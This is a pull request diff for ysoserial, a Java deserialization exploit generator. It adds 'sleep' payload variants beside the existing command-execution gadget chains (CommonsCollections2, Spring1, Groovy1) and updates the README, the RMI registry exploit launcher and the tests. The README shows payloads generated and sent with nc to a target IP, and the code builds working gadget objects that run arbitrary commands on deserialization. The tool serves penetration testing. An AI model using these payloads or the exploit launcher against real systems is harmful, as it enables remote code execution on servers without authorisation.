### PR TITLE
Added native sleep payloads

### DIFF
--- a/README.md
+++ b/README.md
@@ -18,6 +18,11 @@ this data, the chain will automatically be invoked and cause the command to be e
 It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
 gadgets on the classpath.
 
+This version edited by Federico Dotta add the possibility to generate a gadget that lead to the java.lang.Thread.sleep function in addction
+to the java.lang.Runtime.exec one. The sleep function can be easly used to verify the presence of the vulnerability, before using the 
+exec payload to exploit it. It is usefull to have an easy way to detect the presence of the issue because the exec command don't return any output
+and in some cirumstances can be very hard to understand if the injected command has been executed.
+
 ## Disclaimer
 
 This software has been created purely for the purposes of academic research and
@@ -30,18 +35,21 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ```shell
 $ java -jar ysoserial-0.0.1-all.jar
 Y SO SERIAL?
-Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
+Usage: java -jar ysoserial-[version]-all.jar [payload type] [payload function] '[command to execute]'
         Available payload types:
                 CommonsCollections1
                 CommonsCollections2
                 Groovy1
-                Spring1           
+                Spring1   
+        Available payload functions:
+                exec
+                sleep        
 ```
 
 ## Examples
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
+$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 exec calc.exe | xxd
 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
@@ -50,7 +58,7 @@ $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
 0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
 0000570: 0078 7071 007e 003a                      .xpq.~.:
        
-$ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin
+$ java -jar ysoserial-0.0.1-all.jar Groovy1 exec calc.exe > groovypayload.bin
 $ nc 10.10.10.10 < groovypayload.bin
 
 $ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

--- a/README.md
+++ b/README.md
@@ -33,7 +33,7 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ## Usage
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar
+$ java -jar ysoserial-0.0.4-all.jar
 Y SO SERIAL?
 Usage: java -jar ysoserial-[version]-all.jar [payload type] [payload function] '[command to execute]'
         Available payload types:
@@ -49,7 +49,7 @@ Usage: java -jar ysoserial-[version]-all.jar [payload type] [payload function] '
 ## Examples
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 exec calc.exe | xxd
+$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 exec calc.exe | xxd
 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
@@ -58,10 +58,10 @@ $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 exec calc.exe | xxd
 0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
 0000570: 0078 7071 007e 003a                      .xpq.~.:
        
-$ java -jar ysoserial-0.0.1-all.jar Groovy1 exec calc.exe > groovypayload.bin
+$ java -jar ysoserial-0.0.4-all.jar Groovy1 exec calc.exe > groovypayload.bin
 $ nc 10.10.10.10 < groovypayload.bin
 
-$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
+$ java -cp ysoserial-0.0.4-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 exec calc.exe
 ```
 
 ## Installation

--- a/src/main/java/ysoserial/RMIRegistryExploit.java
+++ b/src/main/java/ysoserial/RMIRegistryExploit.java
@@ -24,7 +24,23 @@ public class RMIRegistryExploit {
 			Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));		
 			String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
 			Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
-			Object payload = payloadClass.newInstance().getObjectExec(args[3]);
+			
+			String payloadFunction = args[3];
+			Object payload = null;
+			if(payloadFunction.equals("exec")) {
+				payload = payloadClass.newInstance().getObjectExec(args[4]);
+			} else if(payloadFunction.equals("sleep")){
+				if(!args[2].equals("Groovy1")) {
+					payload = payloadClass.newInstance().getObjectSleep(args[4]);
+				} else {
+					System.err.println("Not implemented. Groovy1 has only exec payload for now.");
+					System.exit(64);
+				}
+			} else {
+				System.err.println("Invalid payload function. Availables: \"exec\", \"sleep\"");
+				System.exit(64);
+			}
+					
 			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
 			try {
 				registry.bind("pwned", remote);

--- a/src/main/java/ysoserial/RMIRegistryExploit.java
+++ b/src/main/java/ysoserial/RMIRegistryExploit.java
@@ -24,7 +24,7 @@ public class RMIRegistryExploit {
 			Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));		
 			String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
 			Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
-			Object payload = payloadClass.newInstance().getObject(args[3]);
+			Object payload = payloadClass.newInstance().getObjectExec(args[3]);
 			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
 			try {
 				registry.bind("pwned", remote);

--- a/src/main/java/ysoserial/payloads/CommonsCollections2.java
+++ b/src/main/java/ysoserial/payloads/CommonsCollections2.java
@@ -28,8 +28,30 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 @Dependencies({"org.apache.commons:commons-collections4:4.0"})
 public class CommonsCollections2 implements ObjectPayload<Queue<Object>> { 
 
-	public Queue<Object> getObject(final String command) throws Exception {		
-		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
+	public Queue<Object> getObjectExec(final String command) throws Exception {		
+		final TemplatesImpl templates = Gadgets.createTemplatesImplExec(command);
+		// mock method name until armed
+		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+		
+		// create queue with numbers and basic comparator
+		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer)); 
+		// stub data for replacement later
+		queue.add(1); 
+		queue.add(1); 
+		
+		// switch method called by comparator
+		Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 
+		
+		// switch contents of queue
+		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+		queueArray[0] = templates;
+		queueArray[1] = 1;
+		
+		return queue;
+	}	
+	
+	public Queue<Object> getObjectSleep(final String command) throws Exception {		
+		final TemplatesImpl templates = Gadgets.createTemplatesImplSleep(command);
 		// mock method name until armed
 		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
 		

--- a/src/main/java/ysoserial/payloads/Groovy1.java
+++ b/src/main/java/ysoserial/payloads/Groovy1.java
@@ -29,14 +29,27 @@ import ysoserial.payloads.util.PayloadRunner;
 @Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
 public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
 
-	public InvocationHandler getObject(final String command) throws Exception {
+	public InvocationHandler getObjectExec(final String command) throws Exception {
 		final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
-		
+				
 		final Map map = Gadgets.createProxy(closure, Map.class);		
-
+		
 		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
 		
 		return handler;
+	}	
+	
+	public InvocationHandler getObjectSleep(final String command) throws Exception {
+		/*
+		final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(java.lang.Thread.class, "sleep"), "entrySet");
+		
+		final Map map = Gadgets.createProxy(closure, Map.class);		
+		
+		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
+		
+		return handler;
+		*/
+		return null;
 	}
 
 	public static void main(final String[] args) throws Exception {

--- a/src/main/java/ysoserial/payloads/ObjectPayload.java
+++ b/src/main/java/ysoserial/payloads/ObjectPayload.java
@@ -5,5 +5,6 @@ public interface ObjectPayload<T> {
 	 * return armed payload object to be serialized that will execute specified 
 	 * command on deserialization
 	 */
-	public T getObject(String command) throws Exception;
+	public T getObjectExec(String command) throws Exception;
+	public T getObjectSleep(String command) throws Exception;
 }

--- a/src/main/java/ysoserial/payloads/Spring1.java
+++ b/src/main/java/ysoserial/payloads/Spring1.java
@@ -49,9 +49,30 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 @SuppressWarnings({"restriction", "rawtypes"})
 @Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
 public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {
+
+	public Object getObjectExec(final String command) throws Exception {
+		final TemplatesImpl templates = Gadgets.createTemplatesImplExec(command);
+		
+		final ObjectFactory objectFactoryProxy = 
+				Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
+		
+		final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 
+				Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
+					.newInstance(objectFactoryProxy), Type.class, Templates.class);
+		
+		final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
+				Gadgets.createMap("getType", typeTemplatesProxy), 
+				forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
+		
+		final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
+		final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
+		Reflections.setFieldValue(mitp, "methodName", "newTransformer");
+
+		return mitp;
+	}	
 	
-	public Object getObject(final String command) throws Exception {
-		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
+	public Object getObjectSleep(final String command) throws Exception {
+		final TemplatesImpl templates = Gadgets.createTemplatesImplSleep(command);
 		
 		final ObjectFactory objectFactoryProxy = 
 				Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);

--- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java
+++ b/src/main/java/ysoserial/payloads/util/PayloadRunner.java
@@ -21,7 +21,7 @@ public class PayloadRunner {
 				
 				System.out.println("generating payload object(s) for command: '" + command + "'");
 				
-				final Object objBefore = clazz.newInstance().getObject(command);
+				final Object objBefore = clazz.newInstance().getObjectExec(command);
 				
 				System.out.println("serializing payload");
 				

--- a/src/test/java/ysoserial/payloads/PayloadsTest.java
+++ b/src/test/java/ysoserial/payloads/PayloadsTest.java
@@ -64,7 +64,7 @@ public class PayloadsTest {
 		Dependencies depsAnn = payloadClass.getAnnotation(Dependencies.class);
 		String[] deps = depsAnn != null ? depsAnn.value() : new String[0];
 		ObjectPayload<?> payload = payloadClass.newInstance();
-		final Object f = payload.getObject(command);
+		final Object f = payload.getObjectExec(command);
 		final byte[] serialized = Serializables.serialize(f);		
 		try {			
 			deserializeWithDependencies(serialized, deps, addlClassesForClassLoader);
@@ -133,14 +133,20 @@ public class PayloadsTest {
 	}
 	
 	public static class ExecMockPayload implements ObjectPayload<ExecSerializable> {
-		public ExecSerializable getObject(String command) throws Exception {
+		public ExecSerializable getObjectExec(String command) throws Exception {
 			return new ExecSerializable(command);
 		}		
+		public ExecSerializable getObjectSleep(String command) throws Exception {
+			return new ExecSerializable(command);
+		}			
 	}
 	
 	public static class NoopMockPayload implements ObjectPayload<Integer> {
-		public Integer getObject(String command) throws Exception {
+		public Integer getObjectExec(String command) throws Exception {
 			return 1;
-		}		
+		}	
+		public Integer getObjectSleep(String command) throws Exception {
+			return 1;
+		}			
 	}	
 }


### PR DESCRIPTION
Added native sleep payloads to CommonsCollections1, CommonsCollections2 and Spring1. Native sleep (Thread.sleep) is very useful to detect the presence of the vulnerability because the result of the exec is not returned by the server. This modified version allow to choose between "exec" and "sleep" functions.